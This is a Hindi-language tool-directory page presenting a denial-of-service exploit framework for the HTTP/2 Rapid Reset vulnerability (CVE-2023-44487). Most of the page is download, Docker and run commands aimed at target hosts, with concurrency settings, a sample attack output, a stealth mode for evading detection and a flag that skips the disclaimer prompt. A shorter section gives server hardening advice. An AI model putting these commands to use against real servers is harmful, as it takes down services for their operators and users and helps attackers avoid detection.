Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Exploit FrameworksVulnerability AnalysisExploitationWeb SecurityPenetration TestingRed TeamingAdversarial Attack
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

रिपॉजिटरी देखें
119 दिन पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-44487 HTTP/2 DoS रैपिड रीसेट एक्सप्लॉइट

प्रोफेशनल एडिशन v1.0.1 | लेखक: सुदीपा वानिगरत्न

Python Version License Version CVSS


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएँ
  • आवश्यकताएँ
  • इंस्टॉलेशन
  • त्वरित आरंभ
  • उपयोग गाइड
  • कॉन्फ़िगरेशन विकल्प
  • Docker समर्थन
  • उदाहरण
  • परिणामों को समझना
  • सुरक्षा अनुशंसाएँ
  • कानूनी अस्वीकरण
  • लेखक
  • परिवर्तन लॉग

अवलोकन

CVE-2023-44487, यानी HTTP/2 रैपिड रीसेट भेद्यता के लिए एक प्रोफेशनल-ग्रेड मूल्यांकन फ्रेमवर्क। यह टूल सुरक्षा पेशेवरों को हाल के वर्षों में खुलासा किए गए सबसे प्रभावशाली HTTP/2 DoS स्थितियों में से एक के विरुद्ध सिस्टम का परीक्षण और सत्यापन करने में मदद करता है।

यह प्रदर्शित करता है कि कैसे HTTP/2 स्ट्रीम को तेज़ी से बनाना और रीसेट करना सर्वर संसाधनों को समाप्त कर सकता है और डिनायल ऑफ सर्विस (DoS) स्थितियों को जन्म दे सकता है।

एक नज़र में मुख्य विशेषताएँ

  • मल्टी-कनेक्शन अटैक इंजन — समवर्ती HTTP/2 कनेक्शन
  • अनुकूली दर नियंत्रण — अधिकतम प्रभावशीलता के लिए गतिशील समायोजन
  • स्टील्थ मोड — यादृच्छिक हेडर और कनेक्शन रोटेशन
  • व्यापक रिपोर्टिंग — जोखिम मूल्यांकन के साथ JSON/CSV
  • Docker समर्थन — कंटेनरीकृत डिप्लॉयमेंट
  • रीयल-टाइम मॉनिटरिंग — लाइव अटैक मेट्रिक्स और प्रगति
  • प्रोफेशनल लॉगिंग — फ़ाइल लॉगिंग के साथ रंगीन कंसोल आउटपुट
उपयोगपरिणाम

भेद्यता विवरण

CVE-2023-44487: HTTP/2 रैपिड रीसेट अटैक

तकनीकी अवलोकन

यह भेद्यता HTTP/2 प्रोटोकॉल के स्ट्रीम प्रबंधन तंत्र का शोषण करती है:

  1. स्ट्रीम निर्माण — क्लाइंट नई स्ट्रीम बनाने के लिए HEADERS फ्रेम भेजता है
  2. तत्काल रीसेट — क्लाइंट तुरंत RST_STREAM फ्रेम भेजता है
  3. सर्वर प्रोसेसिंग — सर्वर को दोनों फ्रेम प्रोसेस करने पड़ते हैं, जिससे संसाधनों की खपत होती है
  4. संसाधन क्षरण — बार-बार चक्र सर्वर संसाधनों को अभिभूत कर देते हैं

प्रभाव

  • HTTP/2 सर्वर पर संसाधन क्षरण
  • संभावित डिनायल ऑफ सर्विस (DoS)
  • लोड बैलेंसर, प्रॉक्सी और CDN को प्रभावित कर सकता है
  • किसी प्रमाणीकरण या विशेष विशेषाधिकार की आवश्यकता नहीं

विशेषताएँ

मुख्य विशेषताएँ

उन्नत क्षमताएँ

  • प्रॉक्सी समर्थन — एक्स्टेंसिबल प्रॉक्सी कॉन्फ़िगरेशन
  • कनेक्शन पूलिंग — कुशल कनेक्शन प्रबंधन
  • त्रुटि पुनर्प्राप्ति — कनेक्शन विफलताओं का सुगम संचालन
  • प्रदर्शन ट्यूनिंग — विभिन्न परिदृश्यों के लिए कॉन्फ़िगर करने योग्य सेटिंग्स
  • CI/CD एकीकरण — स्वचालित सुरक्षा परीक्षण के लिए उपयुक्त

आवश्यकताएँ

सिस्टम आवश्यकताएँ

निर्भरताएँ

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

इंस्टॉलेशन

1. त्वरित इंस्टॉल

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. वर्चुअल एनवायरनमेंट (अनुशंसित)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. Docker इंस्टॉलेशन

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. मैनुअल इंस्टॉलेशन

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

त्वरित आरंभ

बुनियादी उपयोग

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

त्वरित परीक्षण (5 सेकंड)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

पूर्ण मूल्यांकन (60 सेकंड)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

उपयोग गाइड

कमांड लाइन विकल्प

लक्ष्य कॉन्फ़िगरेशन

अटैक कॉन्फ़िगरेशन

उन्नत विकल्प

रिपोर्टिंग


कॉन्फ़िगरेशन विकल्प

ऊपर दिए गए CLI फ़्लैग का उपयोग करके कॉनकरंसी, स्ट्रीम वॉल्यूम, अवधि और रिपोर्टिंग को ट्यून करें। प्रारंभिक सत्यापन के लिए कम -c / -s / -d मान पसंद करें, और फिर केवल उन्हीं सिस्टम पर स्केल करें जिनका स्ट्रेस-टेस्ट करने के लिए आप अधिकृत हैं।


Docker समर्थन

इमेज बनाएं

root@kitploit:~
docker build -t cve-2023-44487-exploit .

बुनियादी मूल्यांकन चलाएं

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

कस्टम पैरामीटर के साथ चलाएं

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

परिणाम स्थानीय रूप से सहेजें

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

इंटरैक्टिव मोड

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

उदाहरण

1. बुनियादी HTTPS मूल्यांकन

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. HTTP मूल्यांकन (SSL के बिना)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. उच्च-प्रदर्शन लैब रन

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. स्टील्थ मोड

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. त्वरित सत्यापन परीक्षण

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. CSV रिपोर्ट बनाएं

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. सत्यापन छोड़ें

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. अधिकृत प्रोडक्शन परीक्षण

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

परिणामों को समझना

आउटपुट मेट्रिक्स

जोखिम मूल्यांकन स्तर

नमूना आउटपुट

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

सुरक्षा अनुशंसाएँ

सिस्टम प्रशासकों के लिए

तत्काल कार्रवाई

  1. सुरक्षा पैच लागू करें

    • नवीनतम HTTP/2 कार्यान्वयन में अपडेट करें
    • विक्रेता-विशिष्ट सुरक्षा पैच लागू करें
    • लोड बैलेंसर और प्रॉक्सी अपडेट करें
  2. रेट लिमिटिंग लागू करें

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. कनेक्शन सीमाएँ

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

कॉन्फ़िगरेशन हार्डनिंग

सेटिंगअनुशंसा
अधिकतम समवर्ती स्ट्रीमप्रति कनेक्शन 100–200 सेट करें
स्ट्रीम रीसेट दरप्रति क्लाइंट <100/सेकंड तक सीमित करें

निगरानी

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

अनुशंसित सुरक्षा नियंत्रण

  • रेट लिमिटिंग — प्रति-क्लाइंट स्ट्रीम सीमाएँ लागू करें
  • कनेक्शन थ्रॉटलिंग — प्रति IP कनेक्शन सीमित करें
  • संसाधन सीमाएँ — कनेक्शन टाइमआउट मान सेट करें
  • निगरानी — विसंगतियों के लिए लॉगिंग और अलर्ट सक्षम करें
  • WAF नियम — HTTP/2-विशिष्ट WAF नियम लागू करें
  • पैच प्रबंधन — नियमित सुरक्षा अपडेट
  • इंसिडेंट रिस्पॉन्स — DoS हमलों के लिए एक योजना रखें

कानूनी अस्वीकरण

महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे ध्यान से पढ़ें

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

उपयोग की शर्तें

इस टूल का उपयोग करके, आप स्वीकार करते हैं और सहमत होते हैं कि:

  1. आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट लिखित अनुमति है
  2. आप इस मूल्यांकन के जोखिमों और संभावित प्रभाव को समझते हैं
  3. आप सभी लागू कानूनों और विनियमों का पालन करेंगे
  4. आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं
  5. आप इस टूल का उपयोग अनधिकृत गतिविधियों के लिए नहीं करेंगे

निषिद्ध उपयोग

इस टूल का उपयोग इनके लिए नहीं किया जाना चाहिए:

  • अनधिकृत परीक्षण या हमले
  • उन प्रणालियों के विरुद्ध डिनायल ऑफ सर्विस जिनके आप स्वामी नहीं हैं या परीक्षण की अनुमति नहीं है
  • प्राधिकरण के बिना प्रोडक्शन प्रणालियों को बाधित करना
  • वित्तीय क्षति पहुँचाना
  • कोई भी अवैध गतिविधि

दायित्व वक्तव्य

लेखक और योगदानकर्ता इस टूल को बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान करते हैं। इस टूल का उपयोग आपके अपने जोखिम पर है। इस टूल के उपयोग से उत्पन्न किसी भी क्षति या कानूनी समस्या के लिए लेखक जिम्मेदार नहीं है।

इस टूल का अनधिकृत उपयोग निम्नलिखित कानूनों का उल्लंघन कर सकता है, जिनमें ये शामिल हैं, लेकिन इन्हीं तक सीमित नहीं:

  • कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) — USA
  • कंप्यूटर मिसयूज़ एक्ट — UK
  • जनरल डेटा प्रोटेक्शन रेगुलेशन (GDPR) — EU
  • अन्य प्रासंगिक स्थानीय, राष्ट्रीय और अंतर्राष्ट्रीय कानून

लेखक

सुदीपा वानिगरत्न

  • सुरक्षा शोधकर्ता और पेनेट्रेशन टेस्टर
  • एप्लिकेशन सुरक्षा और प्रोटोकॉल भेद्यता में विशेषज्ञता
  • GitHub
  • LinkedIn

परिवर्तन लॉग

संस्करण 1.0.1 (वर्तमान)

  • connection_attempts एट्रिब्यूट त्रुटि ठीक की गई
  • SSL/ALPN सत्यापन में सुधार किया गया
  • टाइमआउट हैंडलिंग जोड़ी गई
  • बेहतर त्रुटि पुनर्प्राप्ति
  • --skip-validation फ़्लैग जोड़ा गया
  • Docker समर्थन में सुधार किया गया

संस्करण 1.0.0 (प्रारंभिक)

  • प्रोफेशनल एडिशन का प्रारंभिक रिलीज़
  • मल्टी-कनेक्शन अटैक इंजन
  • अनुकूली दर नियंत्रण
  • स्टील्थ मोड
  • व्यापक रिपोर्टिंग
  • Docker समर्थन

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।


आभार

  • HTTP/2 प्रोटोकॉल टीम
  • सुरक्षा शोधकर्ता जिन्होंने CVE-2023-44487 की पहचान की
  • ओपन सोर्स समुदाय (h2, aiohttp प्रोजेक्ट)

संदर्भ

  • CVE-2023-44487 NVD प्रविष्टि
  • HTTP/2 रैपिड रीसेट अटैक विश्लेषण
  • HTTP/2 प्रोटोकॉल विनिर्देश (RFC 9113)
  • Nginx HTTP/2 सुरक्षा सलाह
  • Apache HTTP/2 सुरक्षा गाइड

सहायता

समस्याओं और प्रश्नों के लिए:

  • GitHub मुद्दे: मुद्दा सबमिट करें
  • ईमेल: [email protected]
  • सुरक्षा संपर्क: यदि आपको इस प्रोजेक्ट में कोई भेद्यता मिलती है, तो कृपया जिम्मेदारी से रिपोर्ट करें।

त्वरित संदर्भ कार्ड

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

अनुस्मारक: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस टूल का उपयोग जिम्मेदारीपूर्वक और नैतिक रूप से करें।


रखरखाव: सुदीपा वानिगरत्न | अंतिम अपडेट: अगस्त 2026

टूल डाउनलोड करें
गुणमान
CVE IDCVE-2023-44487
CVSS स्कोर7.5 (उच्च)
हमला वेक्टरनेटवर्क
हमले की जटिलतानिम्न
प्रभावडिनायल ऑफ सर्विस (संसाधन क्षरण)
प्रभावित प्रोटोकॉलHTTP/2
प्रकटीकरण तिथिअक्टूबर 2023
विशेषताविवरण
HTTP/2 समर्थनh2 लाइब्रेरी का उपयोग करके पूर्ण HTTP/2 प्रोटोकॉल कार्यान्वयन
मल्टी-कनेक्शनकई कनेक्शनों में समवर्ती हमला
SSL/TLSप्रमाणपत्र सत्यापन विकल्पों के साथ HTTPS समर्थन
अनुकूली दर नियंत्रणसर्वर प्रतिक्रिया के आधार पर हमले की दर को गतिशील रूप से समायोजित करता है
स्टील्थ मोडयादृच्छिक हेडर और कनेक्शन रोटेशन
रीयल-टाइम मॉनिटरिंगरन के दौरान लाइव मेट्रिक्स प्रदर्शन
व्यापक रिपोर्टजोखिम मूल्यांकन के साथ JSON/CSV आउटपुट
Docker समर्थनआसान परीक्षण के लिए कंटेनरीकृत डिप्लॉयमेंट
घटकन्यूनतमअनुशंसित
OSLinux / macOS / WindowsLinux या macOS
Python3.7+3.11+
CPU2 कोर4+ कोर
RAM2GB4GB+
नेटवर्क100Mbps1Gbps+
विकल्पविवरणडिफ़ॉल्ट
hostलक्ष्य होस्टनाम या IPआवश्यक
-p, --portलक्ष्य पोर्ट443
--no-sslSSL/TLS अक्षम करेंFalse
--no-verifySSL सत्यापन छोड़ेंFalse
विकल्पविवरणडिफ़ॉल्ट
-c, --connectionsसमवर्ती कनेक्शनों की संख्या50
-s, --streamsप्रति कनेक्शन स्ट्रीम1000
-d, --durationअवधि (सेकंड में)30
--max-streamsअधिकतम कुल स्ट्रीम100000
--delayसंचालनों के बीच आधार विलंब0.0001s
विकल्पविवरणडिफ़ॉल्ट
--adaptiveअनुकूली दर नियंत्रणTrue
--target-rpsप्रति सेकंड लक्षित अनुरोध10000
--stealthस्टील्थ मोड (यादृच्छिक हेडर)False
--skip-validationलक्ष्य सत्यापन छोड़ेंFalse
--forceकानूनी अस्वीकरण संकेत छोड़ेंFalse
विकल्पविवरणडिफ़ॉल्ट
-o, --outputआउटपुट फ़ाइल नामexploit_results.json
--formatआउटपुट प्रारूप (json / csv / console)json
-v, --verboseवर्बोज़ लॉगिंगFalse
परिदृश्यसुझाए गए फ़्लैग
स्मोक टेस्ट-c 10 -s 100 -d 5
मानक मूल्यांकन-c 50 -s 1000 -d 30
उच्च-लोड लैब परीक्षण-c 100 -s 2000 -d 60 --stealth
अविश्वसनीय प्रमाणपत्र--no-verify
प्लेन HTTP-p 80 --no-ssl
मेट्रिकविवरणव्याख्या
कुल स्ट्रीमनिर्मित स्ट्रीमों की संख्याअधिक संख्या = अधिक लोड उत्पन्न
सफल रीसेटसफलतापूर्वक रीसेट की गई स्ट्रीमआमतौर पर भेद्य लक्ष्यों पर >90%
रीसेट दर (RPS)प्रति सेकंड रीसेटउच्च दर = अधिक प्रभावी लोड
सफलता दरसफल रीसेट का प्रतिशत>90% अक्सर संवेदनशीलता का संकेत देता है
कनेक्शन त्रुटियाँविफल कनेक्शनकम = स्थिर कनेक्टिविटी
सर्वर रीसेटसर्वर-आरंभिक रीसेटउच्च = सुरक्षात्मक उपाय मौजूद
स्तरस्कोरअर्थ
गंभीर80–100सर्वर अत्यधिक भेद्य
उच्च60–79सर्वर भेद्य, कुछ सुरक्षा मौजूद
मध्यम40–59कुछ सुरक्षा लागू
निम्न0–39अच्छी तरह से सुरक्षित सर्वर
कनेक्शन सीमाप्रति IP अधिकतम 50–100 कनेक्शन
टाइमआउट माननिष्क्रिय टाइमआउट कम करें
अनुरोध आकार सीमाएँहेडर आकार और पेलोड सीमित करें